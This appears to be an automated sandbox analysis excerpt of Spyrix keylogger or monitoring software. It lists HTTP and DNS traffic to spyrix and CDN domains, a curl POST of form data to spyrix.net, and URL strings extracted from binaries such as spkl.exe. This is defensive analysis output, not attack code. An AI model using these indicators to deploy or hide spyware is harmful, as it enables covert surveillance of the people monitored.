Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-7e7c447a.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.module-6d4e91b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonTemplate.module-c837805f.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.module-c769b9ae.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Modal.module-d62c47b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-ef960fb7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-5393c481.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-1178777c.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.module-6d4e91b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/useValidation-954c07e6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/loop-c45f0f1e.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonTemplate.module-c837805f.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.module-c769b9ae.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Modal.module-d62c47b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Nunito-Bold-765bfff4.woff2 HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/useValidation-954c07e6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/loop-c45f0f1e.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: qrl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: Usage: curl [options...] <url>3[LU[L}[L
Source: qrl.exe, 00000045.00000002.3125634657.00000000004C2000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000045.00000002.3125634657.00000000004C2000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: Usage: curl [options...] <url>3[LU[L}[L

Source: spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SearchID="http://www.myspace.com/search/" equals www.myspace.com (Myspace)
Source: spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.myspace.com/search/ equals www.myspace.com (Myspace)
Source: spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: msgID="http://www.myspace.com/my/mail" equals www.myspace.com (Myspace)

Source: global traffic	DNS traffic detected: DNS query: filedn.com
Source: global traffic	DNS traffic detected: DNS query: cdnbaynet.com
Source: global traffic	DNS traffic detected: DNS query: swtb-download.spyrix-sfk.com
Source: global traffic	DNS traffic detected: DNS query: dashboard.spyrix.com
Source: global traffic	DNS traffic detected: DNS query: spyrix.net
Source: global traffic	DNS traffic detected: DNS query: cdn.cdndownload.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown

HTTP traffic detected: POST /dashboard/prg-actions HTTP/1.1Host: spyrix.netUser-Agent: curl/7.64.0Accept: */*Content-Length: 429Content-Type: application/x-www-form-urlencoded

Source: spkl.exe, 00000033.00000002.3247512604.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: HTTPS://DASHBOARD.SPYRIX.COM/
Source: qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://.css
Source: qrl.exe, qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://.jpg
Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/ca.crl0:
Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/l3.crl0a
Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: curl.exe, 0000000A.00000003.1708738377.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: curl.exe, 0000000A.00000003.1708738377.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
Source: curl.exe, 0000000A.00000003.1708738377.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: 404.exe, 00000000.00000002.1648823536.00000000026A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filedn.com
Source: 404.exe, 00000000.00000002.1648823536.00000000026A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filedn.comd
Source: qrl.exe, qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmp, qrl.exe, 00000045.00000002.3125634657.00000000004C2000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://https://-.://%s%s%s/%s
Source: spkl.exe, 00000033.00000002.3201106110.0000000000929000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2965463976.00000000044E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://neftali.clubdelphi.com/
Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.certum.pl0.
Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: curl.exe, 0000000A.00000003.1708738377.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: curl.exe, 0000000A.00000003.1708738377.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
Source: curl.exe, 0000000A.00000003.1708738377.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://rc.qzone.qq.com/qzonesoso/?search
Source: spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://rc.qzone.qq.com/qzonesoso/?searchq
Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.certum.pl/l3.cer0
Source: 404.exe, 00000000.00000002.1648823536.0000000002692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: curl.exe, 0000000A.00000003.1708738377.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
Source: curl.exe, 0000000A.00000003.1708738377.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: spkl.exe	String found in binary or memory: http://spyrix.com/manual.php
Source: spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://user.qzone.qq.com
Source: spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://vk.com/search
Source: spkl.exe, 00000033.00000002.3247512604.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://vk.com/searchecp
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.actualkeylogger.com/buynow.html
Source: spkl.exe	String found in binary or memory: http://www.actualkeylogger.com/help.html
Source: spkl.exe	String found in binary or memory: http://www.actualkeylogger.com/help.html#registrate
Source: spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.actualkeylogger.com/help.html#registratehttp://www.spyrix.com/manual.php#registrateU
Source: spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.actualkeylogger.com/help.htmlhttp://spyrix.com/manual.phpU
Source: 404.exe, 0000000C.00000003.1711461284.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 404.exe, 0000000C.00000003.3020973710.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3003306994.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.1714710707.00000000031C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.dk-soft.org/
Source: spkl.exe, spkl.exe, 00000033.00000002.3244401024.0000000004541000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3190059842.0000000000863000.00000040.00000001.01000000.00000015.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: spkl.exe	String found in binary or memory: http://www.indyproject.org/Original
Source: 404.exe, 0000000C.00000003.1712113818.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 404.exe, 0000000C.00000003.1712556211.000000007FD10000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000000.1713397511.0000000000401000.00000020.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.jrsoftware.org/0
Source: 404.exe, 0000000C.00000000.1710941911.0000000000401000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.myspace.com/my/mail
Source: spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.myspace.com/search/
Source: spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.ok.ru/dk?st.cmd=searchResult
Source: 404.exe, 0000000C.00000003.1712113818.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 404.exe, 0000000C.00000003.1712556211.000000007FD10000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000000.1713397511.0000000000401000.00000020.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com
Source: 404.exe, 0000000C.00000003.1711461284.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 404.exe, 0000000C.00000003.3020973710.000000000215E000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033FF000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3003306994.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.1714710707.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.2999750559.0000000003247000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/
Source: spkl.exe	String found in binary or memory: http://www.spyrix.com/manual.php#registrate
Source: spkl.exe, 00000033.00000002.3201106110.00000000009EA000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2965463976.0000000004591000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3250270127.000000000653A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/osticket/upload/open.php
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/pro_upgrade.htm?lic=
